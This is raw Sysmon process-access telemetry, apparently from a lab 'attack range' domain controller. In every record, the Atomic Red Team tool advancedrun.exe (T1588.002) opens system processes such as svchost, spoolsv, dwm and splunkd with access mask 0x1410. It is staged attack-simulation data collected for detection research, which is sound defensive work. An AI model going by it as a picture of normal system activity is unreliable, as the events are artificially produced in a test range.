10341000x80000000000000003983758Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3200-000000002702}1948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983757Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3100-000000002702}660C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983756Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983755Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983754Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983753Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2C00-000000002702}2896C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983752Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF2-61EA-2B00-000000002702}2888C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983751Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF0-61EA-2900-000000002702}2760C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983750Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE8-61EA-2000-000000002702}1516C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983749Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1800-000000002702}1384C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983748Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1700-000000002702}1300C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983747Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1600-000000002702}1264C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983746Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1500-000000002702}1064C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983745Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983744Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003983743Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003983742Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
